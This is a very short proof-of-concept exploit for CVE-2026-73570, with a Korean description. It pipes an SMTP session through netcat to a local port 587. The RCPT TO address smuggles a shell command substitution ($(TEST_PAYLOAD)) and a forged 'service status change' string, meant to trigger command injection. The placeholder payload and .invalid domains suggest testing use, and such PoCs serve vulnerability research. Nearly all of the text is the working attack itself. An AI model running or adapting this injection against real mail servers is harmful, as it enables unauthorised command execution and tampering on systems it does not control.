
CVE-2026-73570에 대한 개념 증명 익스플로잇으로, 조작된 RCPT TO 헤더를 통한 SMTP 명령어 주입을 시연하여 서비스 상태 변경을 유발합니다.
CVE-2026-73570 PoC
echo 'EHLO mx-test.invalid
MAIL FROM:<[email protected]>
RCPT TO:<"x: Service status change: localhost $(TEST_PAYLOAD) changed from stopped to running"@cve.invalid>
QUIT\r\n' | nc 127.0.0.1 587